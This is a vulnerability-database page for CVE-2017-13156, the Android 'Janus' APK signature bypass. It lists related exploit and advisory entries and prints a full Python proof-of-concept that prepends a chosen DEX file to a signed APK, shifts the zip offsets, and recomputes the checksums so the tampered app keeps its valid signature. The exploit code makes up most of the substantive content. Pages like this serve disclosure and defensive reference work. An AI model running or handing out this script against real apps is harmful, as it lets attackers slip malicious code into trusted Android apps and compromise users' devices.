Vulners
Lucene search
New Android vulnerability allows attackers to modify apps without affecting their signatures(CVE-2017-13156)
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | Android Janus - APK Signature Bypass Exploit | 9 Nov 201900:00 | – | zdt |
 | Exploit for Unrestricted Upload of File with Dangerous Type in Google Android | 3 Sep 202009:28 | – | githubexploit |
| Exploit for Unrestricted Upload of File with Dangerous Type in Google Android | 22 Mar 202108:27 | – | githubexploit |
| Exploit for Unrestricted Upload of File with Dangerous Type in Google Android | 25 Aug 201916:31 | – | githubexploit |
 | Android Security Bulletin—December 2017Stay organized with collectionsSave and categorize content based on your preferences. | 4 Dec 201700:00 | – | androidsecurity |
 | CVE-2017-13156 | 7 Nov 201902:36 | – | circl |
 | Google Android System(art) elevation of privilege vulnerability | 5 Dec 201700:00 | – | cnvd |
 | CVE-2017-13156 | 6 Dec 201714:00 | – | cve |
 | CVE-2017-13156 | 6 Dec 201714:00 | – | cvelist |
 | CVE-2017-13156 | 6 Dec 201714:00 | – | debiancve |
10
#!/usr/bin/python
import sys
import struct
import hashlib
from zlib import adler32
def update_checksum(data):
m = hashlib.sha1()
m.update(data[32:])
data[12:12+20] = m.digest()
v = adler32(buffer(data[12:])) & 0xffffffff
data[8:12] = struct.pack("<L", v)
def main():
if len(sys.argv) != 4:
print("usage: %s dex apk out_apk" % __file__)
return
_, dex, apk, out_apk = sys.argv
with open(dex, 'rb') as f:
dex_data = bytearray(f.read())
dex_size = len(dex_data)
with open(apk, 'rb') as f:
apk_data = bytearray(f.read())
cd_end_addr = apk_data.rfind('\x50\x4b\x05\x06')
cd_start_addr = struct.unpack("<L", apk_data[cd_end_addr+16:cd_end_addr+20])[0]
apk_data[cd_end_addr+16:cd_end_addr+20] = struct.pack("<L", cd_start_addr+dex_size)
pos = cd_start_addr
while (pos < cd_end_addr):
offset = struct.unpack("<L", apk_data[pos+42:pos+46])[0]
apk_data[pos+42:pos+46] = struct.pack("<L", offset+dex_size)
pos = apk_data.find("\x50\x4b\x01\x02", pos+46, cd_end_addr)
if pos == -1:
break
out_data = dex_data + apk_data
out_data[32:36] = struct.pack("<L", len(out_data))
update_checksum(out_data)
with open(out_apk, "wb") as f:
f.write(out_data)
print ('%s generated' % out_apk)
if __name__ == '__main__':
main()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Dec 2017 00:00Current
7.9High risk
Vulners AI Score7.9
EPSS0.6306